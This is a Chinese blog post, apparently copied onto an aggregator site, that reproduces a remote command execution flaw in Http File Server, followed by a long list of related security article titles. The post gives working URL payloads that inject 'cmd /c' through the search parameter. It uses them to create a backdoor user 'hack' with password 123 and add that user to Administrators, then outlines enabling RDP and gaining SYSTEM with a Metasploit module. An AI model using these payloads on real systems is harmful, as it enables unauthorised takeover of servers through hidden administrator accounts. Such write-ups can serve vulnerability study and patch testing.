HFS远程命令执行漏洞复现
漏洞程序下载地址:Http File Server
这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。
运行程序截图如下
尝试访问该软件提供的web服务
web服务是这个样子的,这个web服务的搜索处存在漏洞
一、手工利用
payload如下
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}
- 1
- 2
完整利用过程如下
使用如下payload添加一个管理员账户
http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.}
- 1
添加用户:hack
密码:123
将用户hack添加到Administrators组。
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}
- 1
开启3389远程端口
使用远程连接工具连接,连接成功。
2、使用msf利用
启动Metasploit,搜索hfs漏洞利用模块
加载模块,并设置目标IP
设置payload,以及本机IP
开始执行
成功获得system权限
http://www.taodudu.cc/news/show-969961.html
相关文章:
- 渗透测试神器CS(4.0)的使用
- git信息泄露漏洞
- 目录爆破工具 -- dirsearch
- 哥斯拉Webshell
- 一次线上ctf的网络协议分析
- 模拟服务器和客户端交互的python脚本
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
- 在BurpSuite中安装Jython环境
- xss测试工具(xsstrike基于python)
- Windows安全配置加固
- 解决Pycharm窗口一闪而过的问题
- 绕过 WAF:绕过一些 WAF 设备的 Burp 插件
- Python 文件读写
- fofa自动化爬虫脚本更新+详解
- JS文件信息收集工具-LinkFinder
- Python----socket编程
- Autorize插件的使用方法
- 一个用于伪造IP地址进行爆破的BurpSuite插件:BurpFakeIP
- BurpSuite插件 -- FastjsonScan(反序列化检测)
- 【工具使用】Xray与Burp联动--流量转发插件Passive Scan Client
- 验证码识别Burp reCAPTCHA插件使用
- BurpSuite插件 -- Struts2-RCE
- Burpsuite爆破含CSRF-Token的程序
- 正则表达式贪婪与非贪婪模式
- 任意文件读取及删除漏洞
- 从JS敏感信息泄露到GETSHELL
- 实战|全程分析js到getshell
- 多家防火墙设备存在信息泄露漏洞
- php boolean 全大写还是全小写,【PHP培训】PHP为什么大小写规则是如此不规则?
- Web安全-伪静态网页
HFS远程命令执行漏洞复现相关推荐
- PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...
- 华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
- 开源堡垒机JumpServer远程命令执行漏洞复现
声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...
- Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析
Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...
- Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现
目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞
- thinkphp5.*远程命令执行漏洞复现
ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http: ...
- O2OA RCE 远程命令执行漏洞复现(CVE-2022-22916)
1.产品简介 O2OA是一款Java开源企业信息化建设平台 ,包括流程管理.门户管理.信息管理.数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度. 2.漏洞概述 O2 ...
- Google 0day远程命令执行漏洞复现
目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面 ...
- Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)
漏洞描述 Solr是Apache Lucene项目的开源企业搜索平台. 其主要功能包括全文检索.命中标示.分面搜索.动态聚类.数据库集成,以及富文本的处理. 2019年10月30日,国外安全研究人员放 ...
最新文章
- centos 6.8 启动损坏修复实验
- 神经网络相关名词解释
- CH - 6201 走廊泼水节(最小生成树,水题)
- 笔记18 客户端跳转
- C# 8.x 先睹为快
- 交换机知识--生成树协议
- 转: android编译过程(流程图)
- cmd 命令行方式执行 matlab 脚本
- ASP.NET的页面生存周期 [转]
- C#中IPAddress与域名的使用
- Linux系统下公式编辑器KLatexFormula
- Jenkins下载安装及配置
- 如何在linux下批量压缩图片
- 第十六周项目3电子词典
- CVE-2014-3566 SSLv3 POODLE原理分析
- ORACLE EBS常用表查询语句
- 移动端开发的兼容适配与性能优化干货分享
- 基于Unity3D的相机功能的实现(六)—— 上帝视角(王者荣耀视角)
- nginx重启报错:nginx: [error] open() “/usr/local/nginx/logs/nginx.pid“ failed (2: No such file or directo
- linux查看某个文件大小
热门文章
- java list 字段去重_如何实现java8 list按照元素的某个字段去重
- python在路径里添加变量_想学Python?那就先从头开始吧!
- airpods耳机敲击没反应_iOS11.2.6造成AirPods耳机出现奇怪问题 网友:解决方法很简单...
- java 异常堆栈日志分析_Java 进阶之路:深入解读 Java 异常堆栈丢失原因
- vue 在 html 中自定义 tag
- Python随笔-切片
- python下载大文件
- quartz Cron-Expression的表达式
- pdf转换成可编辑的word转换器
- DIV+CSS 入门